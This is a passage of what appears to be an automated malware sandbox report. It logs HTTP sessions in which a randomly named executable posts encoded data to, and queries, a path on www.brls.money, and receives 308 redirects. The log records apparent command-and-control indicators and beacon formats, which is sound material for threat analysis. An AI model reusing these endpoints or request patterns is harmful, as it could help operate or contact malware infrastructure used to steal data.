                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 63 44 30 48 52 56 33 64 78 34 4e 58 46 6c 7a 39 4f 47 58 4f 76 5a 4c 77 4c 68 42 69 73 36 33 39 45 59 37 33 51 33 70 65 79 4b 6e 4f 6d 42 37 6b 52 6a 6a 4d 32 63 75 75 56 57 4a 64 30 39 62 34 69 57 46 31 35 4e 71 2b 39 6a 66 49 41 38 35 65 6c 69 4f 55 75 34 78 39 35 39 70 43 6f 51 43 53 39 4d 32 42 54 56 39 66 50 78 64 70 46 78 4f 63 75 70 53 6c 4c 4b 37 34 65 45 53 43 54 74 47 5a 35 4d 78 57 34 58 4a 69 72 4e 76 53 75 75 6f 58 57 56 38 6d 36 51 49 68 6a 31 69 54 6d 6f 72 76 34 61 6b 46 72 52 6c 53 69 73 31 2b 49 71 56 4e 46 51 4d 7a 58 79 42 6e 2f 47 6d 39 47 31 79 4d 61 70 47 6f 42 67 75 61 51 34 4e 76 42 62 72 66 61 6a 78 71 6f 78 67 56 63 64 58 6a 61 79 35 6b 53 61 2f 32 45 68 64 6a 56 4c 77 71 79 55 2f 69 57 4c 6c 65 4e 6c 2f 45 44 59 69 72 62 78 44 68 73 6f 37 49 68 7a 51 4d 6f 54 6e 74 39 4c 6a 69 44 6e 45 63 41 4d 35 2b 4b 38 6b 63 5a 6a 74 6b 57 73 70 2b 77 53 76 4f 54 39 54 6d 58 37 34 54 2f 61 44 55 55 77 7a 41 35 48 37 48 62 48 51 2f 64 44 56 42 77 77 31 72 45 33 52 76 65 36 6e 42 4f 73 72 54 32 36 38 71 72 57 2b 4d 57 75 6a 6c 6c 6e 43 41 74 36 6b 6c 77 51 54 30 35 78 4d 64 6d 5a 48 44 70 6e 78 6c 6d 75 2b 4e 46 63 4c 6f 75 30 78 56 43 72 4d 4c 4f 34 78 69 6c 66 66 65 2f 79 32 43 48 72 78 49 31 78 68 31 39 65 35 45 35 4e 38 30 47 47 32 77 43 48 76 4c 4b 53 4d 42 37 70 4e 35 54 5a 6d 4e 74 6d 32 78 66 6f 35 4b 69 7a 39 50 6a 67 6e 75 68 75 2f 34 36 57 69 69 45 67 2b 36 74 41 39 61 6d 67 65 56 31 6d 57 76 4a 35 4d 52 52 2f 2f 71 7a 59 69 32 30 50 47 77 57 35 31 6c 6f 72 6c 6b 2f 2b 73 4e 69 6c 73 66 47 6d 32 4d 74 70 55 3d
                                                                                                                              Data Ascii: TZd=cD0HRV3dx4NXFlz9OGXOvZLwLhBis639EY73Q3peyKnOmB7kRjjM2cuuVWJd09b4iWF15Nq+9jfIA85eliOUu4x959pCoQCS9M2BTV9fPxdpFxOcupSlLK74eESCTtGZ5MxW4XJirNvSuuoXWV8m6QIhj1iTmorv4akFrRlSis1+IqVNFQMzXyBn/Gm9G1yMapGoBguaQ4NvBbrfajxqoxgVcdXjay5kSa/2EhdjVLwqyU/iWLleNl/EDYirbxDhso7IhzQMoTnt9LjiDnEcAM5+K8kcZjtkWsp+wSvOT9TmX74T/aDUUwzA5H7HbHQ/dDVBww1rE3Rve6nBOsrT268qrW+MWujllnCAt6klwQT05xMdmZHDpnxlmu+NFcLou0xVCrMLO4xilffe/y2CHrxI1xh19e5E5N80GG2wCHvLKSMB7pN5TZmNtm2xfo5Kiz9Pjgnuhu/46WiiEg+6tA9amgeV1mWvJ5MRR//qzYi20PGwW51lorlk/+sNilsfGm2MtpU=
                                                                                                                              Dec 4, 2023 15:25:46.426790953 CET87INHTTP/1.0 308 Permanent Redirect
                                                                                                                              Dec 4, 2023 15:25:46.426857948 CET68INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20
                                                                                                                              Data Ascii: Content-Type:
                                                                                                                              Dec 4, 2023 15:25:46.426902056 CET66INData Raw: 74 65 78 74 2f 70 6c 61 69 6e 0d 0a
                                                                                                                              Data Ascii: text/plain
                                                                                                                              Dec 4, 2023 15:25:46.426942110 CET64INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20
                                                                                                                              Data Ascii: Location:
                                                                                                                              Dec 4, 2023 15:25:46.426980972 CET84INData Raw: 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 72 6c 73 2e 6d 6f 6e 65 79 2f 33 68 72 35 2f 0d 0a
                                                                                                                              Data Ascii: https://www.brls.money/3hr5/
                                                                                                                              Dec 4, 2023 15:25:46.427020073 CET61INData Raw: 52 65 66 72 65 73 68
                                                                                                                              Data Ascii: Refresh
                                                                                                                              Dec 4, 2023 15:25:46.427062035 CET124INData Raw: 3a 20 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 72 6c 73 2e 6d 6f 6e 65 79 2f 33 68 72 35 2f 0d 0a 73 65 72 76 65 72 3a 20 56 65 72 63 65 6c 0d 0a 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e
                                                                                                                              Data Ascii: : 0;url=https://www.brls.money/3hr5/server: VercelRedirecting...


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              51192.168.11.205018276.76.21.142808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:25:48.944977999 CET10342OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.brls.money
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.brls.money
                                                                                                                              Referer: http://www.brls.money/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 63 44 30 48 52 56 33 64 78 34 4e 58 46 6c 7a 39 4f 47 58 4f 76 5a 4c 77 4c 68 42 69 73 36 33 39 45 59 37 33 51 33 70 65 79 4b 66 4f 6d 77 62 6b 52 43 6a 4d 31 63 75 75 4c 47 4a 63 30 39 62 66 69 57 64 78 35 4e 57 41 39 6d 54 49 41 71 70 65 6c 51 32 55 6c 59 78 38 38 39 70 41 73 51 43 38 39 4e 4b 7a 54 56 35 6c 4f 42 70 70 66 32 71 63 38 4f 47 6d 55 71 37 2b 65 45 54 44 59 4e 47 52 35 4d 30 4c 34 58 56 69 72 4f 62 53 38 4d 67 58 58 47 55 6d 39 41 49 75 77 56 69 57 6f 49 71 64 34 62 45 77 72 52 6c 6b 69 75 5a 2b 49 73 56 4e 45 58 34 77 57 53 42 6e 6a 57 6d 38 58 46 2f 48 61 70 62 31 42 67 71 61 51 2b 74 76 44 37 72 66 66 43 78 6c 76 52 67 54 59 64 57 35 65 79 31 37 53 61 36 48 45 6c 4e 6a 56 62 6b 71 79 6e 58 69 61 4f 4a 65 4f 46 2f 47 4d 34 69 6a 52 52 43 6c 73 6f 72 75 68 7a 77 63 6f 52 4c 74 38 72 44 69 46 44 59 64 51 38 34 55 50 38 6b 7a 64 6a 68 6f 57 73 35 79 77 53 76 67 54 38 6e 6d 57 4c 49 54 2b 66 6a 58 65 77 7a 44 67 58 37 53 4a 48 56 77 64 44 5a 2f 77 78 39 37 45 30 39 76 66 61 6e 42 46 74 72 51 38 4b 38 74 7a 57 2f 51 53 75 6a 4c 6c 6e 2f 72 74 2b 63 66 7a 68 2f 30 34 42 63 64 73 70 48 41 69 6e 78 68 39 65 2b 50 4f 38 4c 6f 75 30 39 2f 43 72 41 4c 4f 4b 68 69 6c 6f 37 65 30 46 43 43 42 72 78 53 31 78 67 74 39 65 39 2f 35 4e 6b 61 47 47 6d 61 43 45 44 4c 4b 47 6f 42 32 49 4e 36 44 35 6d 45 37 57 32 71 53 49 39 6a 69 7a 68 58 6a 67 32 54 68 5a 76 34 31 79 47 69 53 51 2b 39 72 67 39 58 68 67 66 4f 78 6d 62 72 4a 35 52 6d 52 2b 4b 33 7a 61 69 32 32 59 72 39 42 39 46 49 30 35 38 4d 39 49 38 56 69 55 49 4a 61 31 58 49 34 59 51 55 71 30 44 51 76 55 55 71 61 38 44 62 61 38 51 7a 51 41 61 59 51 78 56 63 36 4f 6c 6a 7a 46 54 71 42 6f 77 49 7a 2f 38 57 48 4a 79 30 68 4b 55 64 53 53 39 6d 56 76 6e 62 37 4b 41 41 39 46 31 4e 63 41 69 30 55 6d 5a 57 66 78 77 37 6b 41 6d 42 4a 42 65 6f 6d 34 59 65 6b 50 35 71 78 47 79 4c 56 68 64 33 48 33 4c 61 31 77 69 45 4a 52 68 47 44 35 33 48 4c 4c 4b 68 45 44 64 56 74 52 74 4d 62 44 44 50 51 53 61 37 68 67 4e 7a 4a 32 44 4a 6c 61 34 55 33 79 7a 49 31 76 6a 64 39 6d 6e 53 52 64 55 54 4e 76 63 67 41 67 47 2b 63 51 37 2f 4a 7a 63 67 43 4f 53 79 2f 6d 4d 4f 46 45 69 50 61 58 32 79 4d 4c 64 4a 61 31 59 79 35 77 70 45 62 37 32 35 6f 31 44 42 7a 63 43 43 74 6f 71 48 39 55 43 51 7a 6c 4d 66 47 47 74 55 64 6c 71 67 36 4e 74 46 68 63 77 53 6a 43 35 51 72 4c 76 31 79 78 69 43 7a 6e 75 6e 2b 53 73 44 46 6d 56 7a 33 6d 72 68 71 61 59 72 48 78 31 59 6f 69 72 77 56 44 2f 51 79 78 6a 6f 73 53 53 51 78 50 38 5a 6d 47 41 32 33 33 4c 4c 63 30 45 61 6e 4b 4f 67 63 41 77 56 62 4f 7a 57 36 49 58 38 62 33 56 50 33 6b 32 4c 69 48 44 43 74 65 73 45 78 6c 77 77 56 56 31 4e 66 51 68 43 57 63 72 4d 35 74 4b 52 2b 51 6f 2f 52 61 72 41 59 71 48 57 61 62 50 64 6a 47 50 4a 71 61 5a 72 6c 47 61 56 6f 47 73 52 47 7a 34 73 46 2b 61 4e 34 38 78 37 4c 42 4f 65 31 65 54 61 39 37 56 32 2b 56 6b 53 78 78 51 39 48 6f 52 62 30 78 50 41 51 49 54 4e 4f 4f 67 55 4f 38 4b 72 55 77 4b 4c 47 54 75 56 38 52 77 66 72 31 48 42 41 52 59 30 6d 56 69 49 39 69 6b 72 78 48 48 30 5a 70 67 57 57 49 73 75 6d 42 79 46 2b 58 51 50 71 30 35 34 49 50 4f 6a 36 7a 2f 6a 77 4a 4b 67 59 70 43 72 76 48 32 69 50 59 6e 32 39 44 54 74 41 2b 56 50 66 57 4f 49 4b 46 46 72 55 77 73 38 37 70 5a 79 78 59 5a 47 50 49 43 31 5a 70 39 5a 43 37 41 4f 55 4b 54 6c 61 52 63 4d 44 48 72 6c 33 67 36 77 52 67 46 46 2b 63 4f 69 6c 4e 67 74 57 54 62 36 39 36 68 56 78 61 4e 38 4d 2f 64 43 69 42 36 50 6e 59 36 57 31 48 65 58 7a 30 75 58 32 35 35 32 6d 44 32 64 58 73 78 4a 7a 2b 53 33 50 6a 68 4e 58 54 36 56 4e 49 7a 43 6d 57 58 62 79 4d 44 34 73 44 69 66 61 78 77 6e 6d 64 73 4e 6a 63 31 44 4f 67 70 6c 70 46 4c 55 51 73 4c 65 2f 48 2f 51 47 6e 41 6e 73 71 47 5a 6a 74 4c 50 41 68 41 4d 4c 62 46 31 75 48 76 59 43 4e 74 54 66 57 54 69 68 42 6d 66 69 6a 2b 33 6c 51 71 74 43 63 44 51 74 30 63 6b 2b 32 37 58 61 79 73 74 7a 70 50 43 35 55 71 33 4b 55 73 31 30 42 7a 52 30 62 76 6f 33 74 35 6e 6e 75 4a 66 4f 75 52 5a 45 39 6a 79 6e 4d 62 44 75 62 38 55 78 73 6d 77 78 6a 6e 51 43 6c 6d 51 47 67 56 64 63 78 4d 59 63 72 49 2f 4a 2b 52 55 53 34 37 4d 36 51 65 62 2b 45 57
                                                                                                                              Data Ascii: TZd=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
                                                                                                                              Dec 4, 2023 15:25:48.945070982 CET2626OUTData Raw: 44 4b 48 31 74 58 6f 30 79 5a 49 74 55 63 74 58 43 48 48 52 63 42 65 50 6a 4d 54 42 6d 33 69 63 33 45 62 59 39 30 48 78 37 70 66 44 39 56 78 2b 59 32 65 7a 30 46 4e 31 53 54 44 54 36 34 52 73 56 4b 31 4c 70 72 4a 4c 62 4c 78 59 47 7a 69 63 30 62
                                                                                                                              Data Ascii: DKH1tXo0yZItUctXCHHRcBePjMTBm3ic3EbY90Hx7pfD9Vx+Y2ez0FN1STDT64RsVK1LprJLbLxYGzic0bMl8RxEIAKZpSOjS4LAsdhRoGLADP5T5k/CtL46n7jXnGaWOKLmLSaqE+exsi2km+SY4/1nQXU4TKNgdfscA+dzWlMy1uOUfGbPA04ZS0yi6Zu2hV8WcGYxZzI7nJoRSgOj0zwgQbv81lDc6Q7y6qcSEkPdguypjcD
                                                                                                                              Dec 4, 2023 15:25:49.040579081 CET2626OUTData Raw: 6a 66 2f 64 78 35 65 32 42 54 52 34 6c 58 6f 4f 66 59 7a 32 6b 56 64 46 49 74 57 64 57 55 2f 78 77 32 62 4a 7a 42 2b 78 36 69 47 75 39 4a 4a 41 72 6e 37 30 41 44 5a 6d 43 39 54 70 39 47 35 38 6b 53 79 61 65 44 64 32 6b 51 45 63 6f 36 4b 4b 41 34
                                                                                                                              Data Ascii: jf/dx5e2BTR4lXoOfYz2kVdFItWdWU/xw2bJzB+x6iGu9JJArn70ADZmC9Tp9G58kSyaeDd2kQEco6KKA40AZXH03XTeWODX291wuc1BscB2j+6Ehkz1nBChtxhyj48dN11ndy5zMshMjYnn9romFiSlCSnv7p0vzoSrTUFk3O1Vgfcj500+oyv7hgjrVw1QWgBF7FOeu9AKvwtn/uon8qN2ElRjAEhuJe5Mwrs8pZQcbrMB6M8
                                                                                                                              Dec 4, 2023 15:25:49.041023970 CET2626OUTData Raw: 67 75 43 4d 49 61 36 76 4c 76 74 6d 64 42 75 50 6d 47 2b 4e 71 68 65 34 79 50 47 43 77 67 36 58 46 5a 71 69 6e 77 2f 46 58 4a 51 79 66 53 32 4d 52 4d 30 50 4f 6c 64 69 44 78 67 54 43 4c 67 55 7a 30 75 67 72 58 42 76 35 77 43 59 64 52 53 74 75 6a
                                                                                                                              Data Ascii: guCMIa6vLvtmdBuPmG+Nqhe4yPGCwg6XFZqinw/FXJQyfS2MRM0POldiDxgTCLgUz0ugrXBv5wCYdRStujma1bmbFWXyDpJx8UHcSimKEJUmKI63yEuCGEGGuD4NOXYEuJe1vBaUcSh1nXzmIHVGjck/Vepjgz04aFghwPunlXWcvLrPZdU5hZFOUo+WUAdWGy4+4USnHmFFS/AHw3V8jBfeHEiObYEwIX7jB9U4WIIxtZ3UH5b
                                                                                                                              Dec 4, 2023 15:25:49.041245937 CET12914OUTData Raw: 2f 52 63 68 69 4b 54 5a 77 49 4e 49 35 63 6f 76 32 50 42 6f 44 75 58 6d 42 42 50 4a 51 79 38 58 73 45 44 77 53 71 4b 74 45 78 34 44 39 69 6e 47 53 6f 74 71 65 6c 5a 35 61 39 37 52 6d 55 46 70 73 62 69 78 38 68 4d 77 62 63 33 51 6e 30 63 4e 75 35
                                                                                                                              Data Ascii: /RchiKTZwINI5cov2PBoDuXmBBPJQy8XsEDwSqKtEx4D9inGSotqelZ5a97RmUFpsbix8hMwbc3Qn0cNu5Ybu4MbLkWiRRMSOcU0bbmSDoCANkG5GKifughzNkruDKHsO80fh1rtivc9LnlZvjiohBE9iIXTlg3dQToLO7MObDDUJ0nmVon5sEL7yWI4HSXb79Eb0IkntMS9X9y2X82a3+Bx9G/vf8qPTBqBYSiEAOTpOJ8SZsL
                                                                                                                              Dec 4, 2023 15:25:49.041568995 CET5198OUTData Raw: 71 70 34 47 68 59 71 39 4e 67 6b 30 79 72 54 6d 39 44 4b 30 62 44 62 69 76 37 4d 35 59 72 6a 7a 69 53 68 2f 41 59 7a 30 2b 31 63 71 38 72 6f 30 43 32 76 4d 50 37 42 7a 47 70 6c 69 55 79 4a 6f 6c 54 34 49 75 6f 68 59 50 33 56 43 36 4f 70 75 2f 65
                                                                                                                              Data Ascii: qp4GhYq9Ngk0yrTm9DK0bDbiv7M5YrjziSh/AYz0+1cq8ro0C2vMP7BzGpliUyJolT4IuohYP3VC6Opu/eqv7w1EYq/bsQaNUIjafZvZAA/cS2xQrAfO6LcqXIl3qvKQKhflz+P3iHquVPmpTgVWunRWbOMP2XSF64mC/bGqcGDQc0mKTMn7PCU/S2R2AR1pah+GCYt62YExnsZcNc7v7dJg0/TWVlwi86wjQIpfhPbzZ7AO4NY
                                                                                                                              Dec 4, 2023 15:25:49.041738033 CET2626OUTData Raw: 34 4a 79 63 77 35 36 56 4c 78 4e 6f 58 53 45 74 6e 5a 75 37 71 67 48 36 36 78 7a 70 53 69 35 70 35 4a 64 41 45 37 6f 49 4c 5a 69 71 44 5a 34 4e 30 6e 30 7a 31 31 75 62 37 49 6e 71 46 4a 4e 6c 72 46 4f 52 52 50 4d 48 57 52 2f 64 72 7a 68 42 76 75
                                                                                                                              Data Ascii: 4Jycw56VLxNoXSEtnZu7qgH66xzpSi5p5JdAE7oILZiqDZ4N0n0z11ub7InqFJNlrFORRPMHWR/drzhBvuHxoQLcbY+ujyUdJUi4MoB3ysL4/Hx5KsP+6SnK9/dLNqhsrxc8e0GqEPHYTqlssTz/T7gMIPp92zpEjiS+USMabrFWQ8cq6+8aoE2W4I9FGyBqH0yy73/UIO+d+KFTeh+luVNg1m4EXIQ+wOVXeOR+7qNIbXZWjqz
                                                                                                                              Dec 4, 2023 15:25:49.052531004 CET99INHTTP/1.0 308 Permanent Redirect
                                                                                                                              Content-Typ
                                                                                                                              Data Raw:
                                                                                                                              Data Ascii:
                                                                                                                              Dec 4, 2023 15:25:49.052640915 CET66INData Raw: 3a 20 74 65 78 74 2f 70 6c 61 69 6e
                                                                                                                              Data Ascii: : text/plain
                                                                                                                              Dec 4, 2023 15:25:49.052695036 CET64INData Raw: 0d 0a 4c 6f 63 61 74 69 6f 6e
                                                                                                                              Data Ascii: Location
                                                                                                                              Dec 4, 2023 15:25:49.052743912 CET56INData Raw: 3a 20
                                                                                                                              Data Ascii: :
                                                                                                                              Dec 4, 2023 15:25:49.052813053 CET84INData Raw: 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 72 6c 73 2e 6d 6f 6e 65 79 2f 33 68 72 35 2f 0d 0a
                                                                                                                              Data Ascii: https://www.brls.money/3hr5/


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              52192.168.11.205018376.76.21.142808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:25:51.567981958 CET528OUTGET /3hr5/?TZd=RBcnSiCg0exgPH7+amvyuffzGD4zp5v5QJzpEWhW15793hPIewihv82rGn5Qh8bR9T1h4/autzf2BuR5sC2Gt8s6p4k4sTzt/A==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.brls.money
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:25:51.683687925 CET87INHTTP/1.0 308 Permanent Redirect
                                                                                                                              Dec 4, 2023 15:25:51.683716059 CET66INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65
                                                                                                                              Data Ascii: Content-Type
                                                                                                                              Dec 4, 2023 15:25:51.683738947 CET56INData Raw: 3a 20
                                                                                                                              Data Ascii: :
                                                                                                                              Dec 4, 2023 15:25:51.683772087 CET66INData Raw: 74 65 78 74 2f 70 6c 61 69 6e 0d 0a
                                                                                                                              Data Ascii: text/plain
                                                                                                                              Dec 4, 2023 15:25:51.683794022 CET64INData Raw: 4c 6f 63 61 74 69 6f 6e 3a 20
                                                                                                                              Data Ascii: Location:
                                                                                                                              Dec 4, 2023 15:25:51.683818102 CET200INData Raw: 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 72 6c 73 2e 6d 6f 6e 65 79 2f 33 68 72 35 2f 3f 54 5a 64 3d 52 42 63 6e 53 69 43 67 30 65 78 67 50 48 37 2b 61 6d 76 79 75 66 66 7a 47 44 34 7a 70 35 76 35 51 4a 7a 70 45 57 68 57 31 35 37 39 33 68 50 49 65
                                                                                                                              Data Ascii: https://www.brls.money/3hr5/?TZd=RBcnSiCg0exgPH7+amvyuffzGD4zp5v5QJzpEWhW15793hPIewihv82rGn5Qh8bR9T1h4/autzf2BuR5sC2Gt8s6p4k4sTzt/A==&1dr=yP5PQD38
                                                                                                                              Dec 4, 2023 15:25:51.683986902 CET63INData Raw: 0d 0a 52 65 66 72 65 73 68
                                                                                                                              Data Ascii: Refresh
